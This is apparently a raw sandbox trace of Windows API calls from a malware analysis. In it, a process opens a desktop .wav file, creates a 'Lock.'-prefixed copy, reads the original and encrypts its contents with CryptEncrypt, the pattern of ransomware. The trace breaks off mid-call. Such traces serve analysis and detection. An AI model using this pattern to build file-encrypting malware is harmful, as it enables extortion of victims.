RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0099.941] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0099.941] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0099.941] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0099.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0099.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0099.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0099.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0099.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aae878 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0099.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0099.943] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/EkLB 1ywsMV77uH53.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\eklb 1ywsmv77uh53.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0099.943] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.943] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0099.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0099.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0099.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0099.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0099.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0099.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0099.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0099.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0099.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0099.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0099.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0099.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0099.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0099.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0099.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0099.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75150 [0099.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.946] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75150 | out: hHeap=0x2af0000) returned 1 [0099.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0099.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0099.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0099.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0099.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0099.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.EkLB 1ywsMV77uH53.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.eklb 1ywsmv77uh53.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0099.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0099.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0099.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0099.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0099.992] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0099.992] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0099.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0099.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0099.996] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0100.036] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xd9f9, lpOverlapped=0x0) returned 1 [0100.038] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0100.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0100.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0100.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca8020 | out: hHeap=0x2af0000) returned 1 [0100.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0100.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0100.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0100.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0100.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0100.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0100.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0100.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0100.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0100.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.046] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.047] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0100.047] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.047] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0100.047] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.047] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.047] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.048] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.048] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.048] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.048] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0100.048] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.048] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0100.048] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.048] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.048] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.048] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.048] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.048] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.051] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd9f9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xda00) returned 1 [0100.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.051] CharLowerBuffW (in: lpsz="byte[55808]", cchLength=0xb | out: lpsz="byte[55808]") returned 0xb [0100.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.052] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.052] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.052] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.052] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.052] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0100.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ee0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0100.053] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, 